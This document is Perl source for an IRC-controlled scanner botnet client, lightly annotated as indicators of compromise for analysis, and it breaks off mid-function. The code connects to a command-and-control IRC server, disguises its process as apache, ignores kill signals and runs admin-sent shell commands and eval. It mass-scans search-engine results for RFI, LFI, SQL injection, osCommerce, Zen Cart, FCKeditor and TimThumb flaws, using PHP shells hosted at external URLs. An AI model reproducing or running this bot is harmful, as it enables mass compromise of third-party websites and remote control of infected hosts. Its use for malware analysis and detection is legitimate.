- # Analysis of the iPays bot... or rather, the full kit for you to analyse...
- # $injector is HERE --> (add link later, too tired :P)
- # $botshell is HERE --> (add link later, too tired :P)
- # blah, look here too; apparently there's an edit: http://pastebin.com/79QqXkZB
- #!/usr/bin/perl
- ################################################
- use HTTP::Request; #
- use HTTP::Request::Common; #
- use HTTP::Request::Common qw(POST); #
- use LWP::Simple; #
- use LWP 5.53; #
- use LWP::UserAgent; #
- use Socket; #
- use IO::Socket; #
- use IO::Socket::INET; #
- use IO::Select; #
- use MIME::Base64; #
- ################################################
- my $datetime = localtime; # evaluated once at startup; the CTCP TIME reply later in the script sends this fixed stamp, not the current time
- my $fakeproc = "/usr/sbin/apache3 -k start"; # IoC: string later written to $0, so process listings show this instead of the perl command line
- my $ircserver = "irc.ganyot.us.to"; # IoC: default command-and-control IRC host; replaced by the first command-line argument when one is given
- my $ircport = "6667"; # plaintext IRC port used for the outbound TCP connection
- my $nickname = "timlopus"; # IoC: nick the bot registers with
- my $ident = "jems"; # IoC: username field of the USER registration line
- my $channel = "#lopus"; # IoC: channel joined after the server's 001 welcome
- my $admin = "Susis"; # IoC: nick that receives the check-in PRIVMSG; presumably also what isAdmin() tests (isAdmin is not visible here, confirm)
- my $fullname = "Susis IRC Scanner"; # not referenced in the visible part of the script
- my $nob0dy = "15,1(4@9AspAlt15)";
- my $lfilogo = "15,1(4@9LFI15)";
- my $rfilogo = "15,1(4@9RFI15)";
- my $xmllogo = "15,1(4@9XML15)";
- my $sqllogo = "15,1(4@9SQL15)";
- my $oscologo = "15,1(4@9OSCO15)";
- my $zenlogo = "15,1(4@9ZEN15)";
- my $oplogo = "15,1(4@9OPEN15)";
- my $lokologo = "15,1(4@9LOKO15)";
- my $thumblogo = "15,1(4@9TIMTHUMB15)";
- my $lficmd = '!lfi';
- my $rficmd = '!rfi';
- my $xmlcmd = '!xml';
- my $sqlcmd = '!sql';
- my $oscocmd = '!osco';
- my $zencmd = '!zen';
- my $lokocmd = '!loko';
- my $opcmd = '!op';
- my $thumbcmd = '!thumb';
- my $cmdlfi = '!cmdlfi';
- my $cmdxml = '!cmdxml';
- my $injector = "http://sec.usu.ac.id:8080/images/upload_2.jpg"; # IoC: staging URL; named .jpg but later saved under a .php name, so treat the content as PHP, not an image
- my $botshell = "http://sec.usu.ac.id:8080/images/upload_3.jpg"; # IoC: second staged payload URL, handled the same way as $injector
- my $botshell2 = "http://sec.usu.ac.id:8080/images/upload_3.jpg"; # same URL as $botshell in this copy of the kit
- my $thumbshell = "http://blogger.com.autoelectricahernandez.com/x.php"; # IoC: "blogger.com." is only a subdomain label of another domain; not referenced in the visible part of the script
- my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser (http://www.avantbrowser.com)","Avant Browser (http://www.avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511","Mozilla/5.0 (X11; U; Linux 
i686; cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] 
(Windows NT 5.0; U)");
- my $uagent = $uagents[rand(scalar(@uagents))];
- my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";
- my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
- my $loko_output = ("FCKeditor - Resources Browser");
- my $open_output = ("FCKeditor - Connectors Tests");
- my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
- 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
- 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
- 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
- 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
- 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
- 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
- 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
- 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
- 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
- my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
- 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
- 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
- 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
- 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
- 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
- $SIG{'INT'} = 'IGNORE'; # INT, HUP and TERM are ignored, so a plain kill or a closed terminal does not stop the process; SIGKILL cannot be ignored
- $SIG{'HUP'} = 'IGNORE';
- $SIG{'TERM'} = 'IGNORE';
- $SIG{'CHLD'} = 'IGNORE'; # children are not waited for explicitly; the script forks heavily further down
- $SIG{'PS'} = 'IGNORE'; # NOTE(review): 'PS' does not look like a standard signal name; probably has no effect, confirm
- $ircserver = "$ARGV[0]" if $ARGV[0]; # first command-line argument overrides the hard-coded IRC host
- $0 = "$fakeproc"."\0" x 16;; # process-name masquerade: ps/top show $fakeproc; responders should compare the displayed command line with /proc/<pid>/exe, which still points at perl
- my $pid = fork; # background the bot: the parent exits below and the child carries on
- exit if $pid;
- die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); # reached only when fork failed ($pid undefined)
- our %irc_servers; # per-connection state, keyed by the socket handle
- our %DCC; # declared here; not used in the visible part of the script
- my $dcc_sel = new IO::Select->new(); # indirect-object call chained with ->new(); $dcc_sel is not used in the visible part of the script
- $sel_client = IO::Select->new(); # undeclared package global: select set polled by the main read loop
- sub sendraw { # Write one newline-terminated line to an IRC socket. Called as sendraw($socket, $text) or sendraw($text).
- if ($#_ == '1') { # last index 1 means two arguments were passed: (socket, text)
- my $socket = $_[0];
- print $socket "$_[1]\n"; # text is written verbatim; nothing strips embedded line breaks before it reaches the wire
- } else { # any other argument count: the first argument is the text, sent on the global current socket
- print $IRC_cur_socket "$_[0]\n";
- }
- }
- sub connector { # Open the outbound IRC connection and register. Arguments: nick, server host, server port. Returns 1 when the TCP connect fails.
- my $mynick = $_[0];
- my $ircserver_con = $_[1];
- my $ircport_con = $_[2];
- my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); # plaintext TCP; the main loop calls connector again while no server is recorded, so a blocked C2 host shows up as rapid repeated connection attempts
- if (defined($IRC_socket)) {
- $IRC_cur_socket = $IRC_socket; # global that sendraw() falls back to
- $IRC_socket->autoflush(1);
- $sel_client->add($IRC_socket); # register the socket with the select set the main loop reads from
- $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; # state table is keyed by the stringified socket handle
- $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; # local address of the infected host as seen by the socket
- nick("$mynick"); # nick() is defined outside the visible part of the script; presumably sends NICK, confirm
- my $versi = "9,1[!] 1,15 Maza CreW 9,1 [!]"; # IoC: realname field of the registration; the digits look like IRC colour codes
- sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi"); # USER line carries the host's own local IP in clear text, which is useful for network signatures
- sleep (1);}} # short pause after registering
- sub parse { # Handle one server line: keep-alive, nick tracking, nick collision, and post-registration check-in. Takes the raw line as its only argument.
- my $servarg = shift;
- if ($servarg =~ /^PING \:(.*)/) { # server keep-alive: echo the token back
- sendraw("PONG :$1");
- }
- elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { # somebody changed nick
- if (lc($1) eq lc($mynick)) { # it was this bot: record the new nick ($mynick is a global set by the main loop)
- $mynick = $4;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- }
- }
- elsif ($servarg =~ m/^\:(.+?)\s+433/i) { # numeric 433: nickname already in use
- nick("$mynick".int rand(1)); # int rand(1) is always 0, so the retry nick is the current nick with "0" appended
- }
- elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { # numeric 001: registration accepted
- $mynick = $2; # nick as confirmed by the server
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; # server name taken from the message prefix
- sendraw("MODE $mynick +i"); # set user mode +i on itself
- sendraw("JOIN $channel"); # join the control channel
- sleep(2);
- sendraw("PRIVMSG $admin :Hi $admin im here !!!"); # IoC: fixed check-in message to the operator nick, sent in clear text on every successful registration
- }
- }
- my $line_temp;
- while( 1 ) {
- while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
- select(undef, undef, undef, 0.01);;
- delete($irc_servers{''}) if (defined($irc_servers{''}));
- my @ready = $sel_client->can_read(0);
- next unless(@ready);
- foreach $fh (@ready) {
- $IRC_cur_socket = $fh;
- $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
- $nread = sysread($fh, $ircmsg, 4096);
- if ($nread == 0) {
- $sel_client->remove($fh);
- $fh->close;
- delete($irc_servers{$fh});
- }
- @lines = split (/\n/, $ircmsg);
- $ircmsg =~ s/\r\n$//;
- if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
- my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
- my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";
- if ($path eq $mynick) {
- if ($msg =~ /^PING (.*)/) {
- sendraw("NOTICE $nick :PING $1");
- }
- if ($msg =~ /^VERSION/) {
- sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
- }
- if ($msg =~ /^TIME/) {
- sendraw("NOTICE $nick :TIME ".$datetime."");
- }
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
- sendraw("NICK ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- sendraw($IRC_cur_socket, "PRIVMSG $nick :9,1Fake Process/PID : $fakeproc - $$");
- }
- if (&isAdmin($nick) && $msg !~ /^!/) {
- &shell("$nick","$msg");
- }
- if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
- my $url = $1.$lfdtest;
- my $cmd = $2;
- &cmdlfi($url,$cmd,$nick);
- }
- if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
- my $url = $1;
- my $cmd = $2;
- &cmdxml($url,$cmd,$nick);
- }
- }
- else {
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg eq "!part") {
- sendraw("PART $path");
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
- eval "$1";
- }
- ##################################################################### HIT
- if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
- my $url = $1.$lfdtest;
- my $cmd = $2;
- &cmdlfi($url,$cmd,$path);
- }
- if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
- my $url = $1;
- my $cmd = $2;
- &cmdxml($url,$cmd,$path);
- }
- ##################################################################### HELP COMMAND
- if ($msg=~ /^!help/) {
- my $helplogo = "15,1(4@9Help15)";
- &msg("$path","$helplogo 14 #####################9[HELP]14##############################");
- &msg("$path","$helplogo 7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|$thumbcmd [bug][dork]|!portscan[ip][port]) )");
- &msg("$path","$helplogo 7 ( $cmdlfi|$cmdxml) [target][cmd] )");
- &msg("$path","$helplogo 7 ( $zencmd | $oscocmd | $lokocmd | $opcmd [dork] ) ");sleep(2);
- &msg("$path","$helplogo 7 ( !about|!engine|!version|!pid )");
- &msg("$path","$helplogo 14 ######################9[END HELP]14#########################");
- }
- if ($msg=~ /^!engine/) {
- my $enginelogo = "15,1(4@9EnginE15)";
- &msg("$path","$enginelogo 4 GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio");
- &msg("$path","$enginelogo 4 WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo");
- &msg("$path","$enginelogo 4 BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR");
- }
- if ($msg=~ /^!about/) {
- my $aboutlogo = "15,1(4@9About Bot15)";
- &msg("$path","$aboutlogo 9Nob0dy Priv8 Scanner SE v1.2 Coded by Vrs-hCk");
- &msg("$path","$aboutlogo 13CoDeD by c0li ByroeNet");
- &msg("$path","$aboutlogo 7Modified by ipays ByroeNet");
- }
- if ($msg=~ /^!version/) {
- my $versionlogo = "15,1(4@9Version15)";
- &msg("$path","$versionlogo 13 priv8 SE v1.2");
- }
- if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
- if (&isFound($injector,"SkFOQ09L=")) {
- &msg("$path","15,1(4@9Injector15)13 PHP Shell 9READY!!!");
- } else {
- &msg("$path","15,1(4@9Injector15)13 PHP Shell 4LOST!!!");
- }
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- ¬ice("$nick","9,1Fake Process/PID : 8$fakeproc - $$");
- }
- ##################################################################### RFI SCAN
- if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$rfilogo 9Dork :4 $dork");
- &msg("$path","$rfilogo 13Bugz :4 $bug");
- &msg("$path","$rfilogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,1);
- } else {
- &msg("$path","[ $nick ] $rfilogo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### LFI SCAN
- if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$lfilogo 9Dork :4 $dork");
- &msg("$path","$lfilogo 13Bugz :4 $bug");
- &msg("$path","$lfilogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,2);
- } else {
- &msg("$path","[ $nick ] $lfilogo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### XML SCAN
- if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$xmllogo 9Dork :4 $dork");
- &msg("$path","$xmllogo 13Bugz :4 $bug");
- &msg("$path","$xmllogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,3);
- } else {
- &msg("$path","[ $nick ] $xmllogo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### SQL SCAN
- if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$sqllogo 9Dork :4 $dork");
- &msg("$path","$sqllogo 13Bugz :4 $bug");
- &msg("$path","$sqllogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,4);
- }
- exit;
- }
- }
- ##################################################################### OSCO SCAN
- if ($msg=~ /^$oscocmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ("admin/categories.php/login.php?cPath=&action=new_product_preview",$1);
- &msg("$path","$oscologo 9Dork :4 $dork");
- &msg("$path","$oscologo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,5);
- } else {
- &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### OSCO SCAN
- if ($msg=~ /^$oscocmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);
- &scan_start($path,$bug,$dork,$engine,5);
- } else {
- &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### LOKO SCAN
- if ($msg=~ /^$lokocmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ("filemanager/browser.html",$1);
- &msg("$path","$lokologo 9Dork :4 $dork");
- &msg("$path","$lokologo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,6);
- }
- exit;
- }
- }
- ##################################################################### OPENCART SCAN
- if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$oplogo 9Dork :4 $dork");
- &msg("$path","$oplogo 13Bugz :4 $bug");
- &msg("$path","$oplogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,7);
- }
- exit;
- }
- }
- ##################################################################### ZEN SCAN
- if ($msg=~ /^$zencmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
- &msg("$path","$zenlogo 9Dork :4 $dork");
- &msg("$path","$zenlogo 13Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,8);
- }
- exit;
- }
- }
- ##################################################################### ZEN SCAN
- if ($msg=~ /^$zencmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ("admin/record_company.php",$1);
- &scan_start($path,$bug,$dork,$engine,8);
- }
- exit;
- }
- }
- ##################################################################### TIMTHUMB.PHP SCAN (ADDED)
- if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$thumblogo 9Dork :4 $dork");
- &msg("$path","$thumblogo 13Bugz :4 $bug");
- &msg("$path","$thumblogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,9);
- }
- exit;
- }
- }
- #####################################################################
- }
- }
- for(my $c=0; $c<= $#lines; $c++) {
- $line = $lines[$c];
- $line = $line_temp.$line if ($line_temp);
- $line_temp = '';
- $line =~ s/\r$//;
- unless ($c == $#lines) {
- &parse("$line");
- } else {
- if ($#lines == 0) {
- &parse("$line");
- } elsif ($lines[$c] =~ /\r$/) {
- &parse("$line");
- } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
- &parse("$line");
- } else {
- $line_temp = $line;
- }
- }
- }
- }
- }
- #########################################
- sub type () { # Dispatch a scan job to the handler selected by the numeric $type (1-9). The empty prototype is bypassed because callers use the &type(...) form.
- my ($chan,$bug,$dork,$engine,$type) = @_; # reply target, path under test, search query, engine name, scan kind
- if ($type == 1){&rfi($chan,$bug,$dork,$engine);} # 1 = rfi
- elsif ($type == 2){&lfi($chan,$bug,$dork,$engine);} # 2 = lfi
- elsif ($type == 3){&xml($chan,$bug,$dork,$engine);} # 3 = xml
- elsif ($type == 4){&sql($chan,$bug,$dork,$engine);} # 4 = sql (handler not visible here)
- elsif ($type == 5){&osco($chan,$bug,$dork,$engine);} # 5 = osco (handler not visible here)
- elsif ($type == 6){&loko($chan,$bug,$dork,$engine);} # 6 = loko (handler not visible here)
- elsif ($type == 7){&op($chan,$bug,$dork,$engine);} # 7 = op (handler not visible here)
- elsif ($type == 8){&zen($chan,$bug,$dork,$engine);} # 8 = zen (handler not visible here)
- elsif ($type == 9){&thumb($chan,$bug,$dork,$engine);} # 9 = thumb (handler not visible here)
- } # any other $type falls through and nothing is called
- sub scan_start() {
- my ($chan,$bug,$dork,$engine,$type) = @_;
- if ($engine =~ /google/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"GooGLe",$type);
- } exit; }
- }
- if ($engine =~ /google2/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"GooGle2",$type);
- } exit; }
- }
- if ($engine =~ /bing/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"Bing",$type);
- } exit; }
- }
- if ($engine =~ /altavista/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"ALtaViSTa",$type);
- } exit; }
- }
- if ($engine =~ /ask/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"AsK",$type);
- } exit; }
- }
- if ($engine =~ /uol/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"UoL",$type);
- } exit; }
- }
- if ($engine =~ /yahoo/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"YahOo",$type);
- } exit; }
- }
- if ($engine =~ /clusty/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"CluSty",$type);
- } exit; }
- }
- if ($engine =~ /gutser/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"GutSer",$type);
- } exit; }
- }
- if ($engine =~ /rediff/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"ReDiff",$type);
- } exit; }
- }
- if ($engine =~ /virgilio/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"VirgiLio",$type);
- } exit; }
- }
- if ($engine =~ /webde/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"WebDe",$type);
- } exit; }
- }
- if ($engine =~ /exalead/i) {
- if ($pid = fork) { waitpid($pid, 0); }
